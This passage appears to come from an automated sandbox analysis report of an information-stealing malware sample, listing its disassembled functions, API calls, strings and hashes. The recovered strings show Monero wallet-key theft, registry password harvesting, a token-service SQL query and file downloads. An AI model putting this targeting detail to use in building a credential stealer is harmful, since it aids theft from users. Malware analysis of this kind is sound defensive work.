                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 2700be56a774e24ba87d048ed73c470fa6984c2fd9c5470a5dcbe0444df70be3
                              • Instruction ID: 4a2eb9679b1f0ac55cdaa2b030d6b9340856490bb57dbb68b361ed23b7e5907a
                              • Opcode Fuzzy Hash: 2700be56a774e24ba87d048ed73c470fa6984c2fd9c5470a5dcbe0444df70be3
                              • Instruction Fuzzy Hash: 08510EF1D5011D97CB15EB60DD92BFD737CAB94700F4045A8B70A62092EE706B8ACBA6
                              Function 009E75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009E72D0: memset.MSVCRT ref: 009E7314
                                • Part of subcall function 009E72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009E733A
                                • Part of subcall function 009E72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009E73B1
                                • Part of subcall function 009E72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 009E740D
                                • Part of subcall function 009E72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 009E7452
                                • Part of subcall function 009E72D0: HeapFree.KERNEL32(00000000), ref: 009E7459
                              • lstrcat.KERNEL32(00000000,00A017FC), ref: 009E7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009E7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 009E765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009E768F
                              • lstrcat.KERNEL32(00000000,00A01804), ref: 009E76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009E76D3
                              • lstrcat.KERNEL32(00000000,00A01808), ref: 009E76ED
                              • task.LIBCPMTD ref: 009E76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: b7738f4d9a1ad24747083475e47e309451c6315210b08dd07ae98ffe123c8bf5
                              • Instruction ID: 7fcf4503ac37c86f174ea7038f194d98a15e0ea9155b90dddb6e3a858c8902ed
                              • Opcode Fuzzy Hash: b7738f4d9a1ad24747083475e47e309451c6315210b08dd07ae98ffe123c8bf5
                              • Instruction Fuzzy Hash: 1E314975910149EBCB1AEBE5DC85FFFB378BB84701B104518F106A72A0DA38AD47CB52
                              Function 009E72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 009E7314
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009E733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009E73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 009E740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 009E7452
                              • HeapFree.KERNEL32(00000000), ref: 009E7459
                              • task.LIBCPMTD ref: 009E7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: 5ed1f413e87e69bd879f889dc1684f4fe59a16e19ff61439e0913045861ec3b9
                              • Instruction ID: 9652e06e7b2929d8372d89730e3fd267b17f5ed1b79545b027db38d290bb9aaa
                              • Opcode Fuzzy Hash: 5ed1f413e87e69bd879f889dc1684f4fe59a16e19ff61439e0913045861ec3b9
                              • Instruction Fuzzy Hash: A2611BB590429C9BDB25DB91DC45BDAB7B8BF48300F0081E9E649A6181EB705FC9CFA1
                              Function 009F8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013BDE30,00000000,?,00A00E2C,00000000,?,00000000), ref: 009F8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 009F8158
                              • __aulldiv.LIBCMT ref: 009F8172
                              • __aulldiv.LIBCMT ref: 009F8180
                              • wsprintfA.USER32 ref: 009F81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 69dee90a950c6a46df13944e86ee05fc4101def121f8d41a17c5210e1d958884
                              • Instruction ID: 373ee563dc0337da8ddf636bd700106f5476b4cf065043211bd2caaf5880ba41
                              • Opcode Fuzzy Hash: 69dee90a950c6a46df13944e86ee05fc4101def121f8d41a17c5210e1d958884
                              • Instruction Fuzzy Hash: 6821F7B1A4421CABDB10DFD5DC49FAFB7B9FB44B14F104609F705AB280D778A9018BA5
                              Function 009E60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009E4839
                                • Part of subcall function 009E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009E4849
                              • InternetOpenA.WININET(00A00DF7,00000001,00000000,00000000,00000000), ref: 009E610F
                              • StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 009E618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009E61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 009E61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009E620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 009E6249
                              • InternetCloseHandle.WININET(?), ref: 009E6253
                              • InternetCloseHandle.WININET(00000000), ref: 009E6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: e5e089a00a4d513f2b603d4cd47d7b2645b454708908ee2b1e853739858dd8b7
                              • Instruction ID: e6a59c421562ed2d2c14bb1dc8b272aaeaa4193791aa8bf98cfc71afcf615db7
                              • Opcode Fuzzy Hash: e5e089a00a4d513f2b603d4cd47d7b2645b454708908ee2b1e853739858dd8b7
                              • Instruction Fuzzy Hash: C25182B1900208ABDB21DF51DC45BEE77B8FB44741F108098B705A72C1DB74AE85CF95
                              Function 009EBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                              • lstrlen.KERNEL32(00000000), ref: 009EBC9F
                                • Part of subcall function 009F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009F8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 009EBCCD
                              • lstrlen.KERNEL32(00000000), ref: 009EBDA5
                              • lstrlen.KERNEL32(00000000), ref: 009EBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 9eeb80dcc4435c22e86c71cf65277df318e7b7b971751e44e1e08182ef6788d8
                              • Instruction ID: 390b1c6b9ef5df51daf9ffa81e2fdf59abd873cc6805d05aa660a62c3b5e5626
                              • Opcode Fuzzy Hash: 9eeb80dcc4435c22e86c71cf65277df318e7b7b971751e44e1e08182ef6788d8
                              • Instruction Fuzzy Hash: A9B133B191010CABDB14FBA0DD56FFE7379AF94300F404568F60AA6091EF746E49CBA6
                              Function 009F6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: fde8b2e804a07b7e0a08e309d986a58c841745b104c0e4558cffe24e6b8a7aa5
                              • Instruction ID: 87bc576b2eed75f4f90ec5227ee320e0c6478ff03ee4d5593ce32746c154fdd1
                              • Opcode Fuzzy Hash: fde8b2e804a07b7e0a08e309d986a58c841745b104c0e4558cffe24e6b8a7aa5
                              • Instruction Fuzzy Hash: 13F05E30928309EFD354AFE0E90972CBB70FB18B03F040198E609C6690D6705B42DB9A
                              Function 009E4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 009E4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009E4FD1
                              • InternetOpenA.WININET(00A00DDF,00000000,00000000,00000000,00000000), ref: 009E4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 009E5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 009E5041
                              • InternetCloseHandle.WININET(?), ref: 009E50B9
                              • InternetCloseHandle.WININET(?), ref: 009E50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 3830db4aef3a8ae76a6f3acc68695693b662e8216e414938e34e0b566d56dd85
                              • Instruction ID: 5b389d7f2f03c61a249020ebdde02a6ee102dec82cd2b2ffefb2f9f577c5b20c
                              • Opcode Fuzzy Hash: 3830db4aef3a8ae76a6f3acc68695693b662e8216e414938e34e0b566d56dd85
                              • Instruction Fuzzy Hash: 423105B4A00218ABDB20CF54DC85BDCB7B5EB48704F1081E9FB09A7281C7706EC68F99
                              Function 009F83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009F8426
                              • wsprintfA.USER32 ref: 009F8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009F847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F8499
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,013BDF98,00000000,000F003F,?,00000400), ref: 009F84EC
                              • lstrlen.KERNEL32(?), ref: 009F8501
                              • RegQueryValueExA.ADVAPI32(00000000,013BDE90,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00A00B34), ref: 009F8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: d11b0b7cd693fc4c5ff09a97bbc305a6d481f041b25c8545b57caff270e2eb11
                              • Instruction ID: 41ebdb94979de44159b16fd6a9c814ef7273d69006e3f8db78fd1a0f00461fec
                              • Opcode Fuzzy Hash: d11b0b7cd693fc4c5ff09a97bbc305a6d481f041b25c8545b57caff270e2eb11
                              • Instruction Fuzzy Hash: A621E7B191021CABDB64DB54DC85FE9B7B8FB48700F00C598E609A6180DF716A86CFD4
                              Function 009F7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,013ABAB8,00000000,00020119,00000000), ref: 009F76DD
                              • RegQueryValueExA.ADVAPI32(00000000,013BDF80,00000000,00000000,?,000000FF), ref: 009F76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 659080bab9bec201c31265cdfd1194e38f31055c820bd7b2ebe8745532dbc877
                              • Instruction ID: 1ffc0775198c9dfb0659f6f5becca950a41ceecdd2e4715f119c3c974aa0dbc9
